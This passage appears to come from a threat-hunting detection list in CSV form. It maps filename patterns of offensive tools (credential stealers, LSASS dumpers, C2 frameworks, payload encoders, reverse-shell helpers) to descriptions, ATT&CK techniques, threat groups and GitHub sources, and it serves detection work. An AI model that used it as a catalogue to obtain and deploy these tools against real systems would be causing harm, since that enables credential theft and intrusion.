T1059","TA0006","N/A","EvilCorp*","Credential 
Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","18350" "*\SelectMyParent.exe*",".{0,1000}\\SelectMyParent\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18351" "*\SelectObjectCommand.cs",".{0,1000}\\SelectObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","18352" "*\self_deletion.exe*",".{0,1000}\\self_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18353" "*\sendkeys.ps1*",".{0,1000}\\sendkeys\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18354" "*\SeRestorePrivilegeTestFile.txt*",".{0,1000}\\SeRestorePrivilegeTestFile\.txt.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18355" "*\server\VncSharp\obj\Debug\VncSharp.pdb*",".{0,1000}\\server\\VncSharp\\obj\\Debug\\VncSharp\.pdb.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#content","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","18356" "*\ServerC2.cpp*",".{0,1000}\\ServerC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","18357" "*\ServerC2.exe*",".{0,1000}\\ServerC2\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","18358" "*\ServerC2\ServerC2.*",".{0,1000}\\ServerC2\\ServerC2\..{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","18359" "*\servers\dns_server.py*",".{0,1000}\\servers\\dns_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection 
capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","18360" "*\servers\icmp_server.py*",".{0,1000}\\servers\\icmp_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","18361" "*\servers\smb_server.py*",".{0,1000}\\servers\\smb_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","18362" "*\services.py*",".{0,1000}\\services\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18364" "*\services\p2p\p2p.go*",".{0,1000}\\services\\p2p\\p2p\.go.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","18370" "*\services\PWDumpX\*",".{0,1000}\\services\\PWDumpX\\.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#registry","N/A","10","8","N/A","N/A","N/A","N/A","18371" "*\SessionExec.exe*",".{0,1000}\\SessionExec\.exe.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","0","N/A","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","18375" "*\SessionGopher.ps1*",".{0,1000}\\SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18376" "*\SessionGopher.ps1*",".{0,1000}\\SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. 
It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","18377" "*\Sessions\SH-MatchedGroups-*.txt*",".{0,1000}\\Sessions\\SH\-MatchedGroups\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","18378" "*\SessionSearcher.csproj*",".{0,1000}\\SessionSearcher\.csproj.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","18379" "*\SessionSearcher.exe*",".{0,1000}\\SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18380" "*\SessionSearcher.exe*",".{0,1000}\\SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","18381" "*\set_allowlongscriptruntime.py*",".{0,1000}\\set_allowlongscriptruntime\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18382" "*\set_allowlongscriptruntime.txt*",".{0,1000}\\set_allowlongscriptruntime\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18383" "*\SetClipboardCommand.cs",".{0,1000}\\SetClipboardCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging 
mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","18386" "*\SetNTLM.ps1*",".{0,1000}\\SetNTLM\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","18388" "*\setvaluehkcuregistry.py*",".{0,1000}\\setvaluehkcuregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18390" "*\setvaluehkcuregistry.txt*",".{0,1000}\\setvaluehkcuregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","18391" "*\sgn.exe*",".{0,1000}\\sgn\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18393" "*\sgn_linux-amd64.zip*",".{0,1000}\\sgn_linux\-amd64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18394" "*\sgn_windows-amd64.exe*",".{0,1000}\\sgn_windows\-amd64\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18395" "*\sgn_windows-amd64.zip*",".{0,1000}\\sgn_windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18396" "*\sgn32.exe*",".{0,1000}\\sgn32\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","18397" "*\shad0w.py*",".{0,1000}\\shad0w\.py.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - 
TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","18398" "*\shad0w.scr*",".{0,1000}\\shad0w\.scr.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","18399" "*\shadowcoerce.py*",".{0,1000}\\shadowcoerce\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","18400" "*\shadowcoerce.py*",".{0,1000}\\shadowcoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18401" "*\ShadowCredentials.cs*",".{0,1000}\\ShadowCredentials\.cs.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","18402" 
"*\ShadowDumper.*",".{0,1000}\\ShadowDumper\..{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","18403" "*\ShadowSpray.cs*",".{0,1000}\\ShadowSpray\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","18409" "*\ShadowSpray.exe*",".{0,1000}\\ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18410" "*\ShadowSpray.sln*",".{0,1000}\\ShadowSpray\.sln.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/Dec0ne/ShadowSpray","1","0","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","18411" "*\ShadowSpray\*.cs*",".{0,1000}\\ShadowSpray\\.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","18412" "*\ShadowStealer.csproj*",".{0,1000}\\ShadowStealer\.csproj.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","18413" "*\ShadowStealer.csproj*",".{0,1000}\\ShadowStealer\.csproj.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","18414" "*\ShadowStealer.sln*",".{0,1000}\\ShadowStealer\.sln.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","18415" "*\ShadowStealer\*",".{0,1000}\\ShadowStealer\\.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential 
Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","18416" "*\ShadowTech Rat.exe*",".{0,1000}\\ShadowTech\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18417" "*\shareaudit.exe*",".{0,1000}\\shareaudit\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","18418" "*\ShareAudit.sln*",".{0,1000}\\ShareAudit\.sln.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","18419" "*\Sharefinder.ps1*",".{0,1000}\\Sharefinder\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","18420" "*\ShareFinder.txt*",".{0,1000}\\ShareFinder\.txt.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","18421" "*\Shares_CleanupCommand.txt*",".{0,1000}\\Shares_CleanupCommand\.txt.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","18422" "*\Shares_Readable.txt*",".{0,1000}\\Shares_Readable\.txt.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","18423" 
"*\Shares_Writable.txt""*",".{0,1000}\\Shares_Writable\.txt\"".{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","18424" "*\Sharp3389.exe*",".{0,1000}\\Sharp3389\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18425" "*\SharpADWS.csproj*",".{0,1000}\\SharpADWS\.csproj.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","18426" 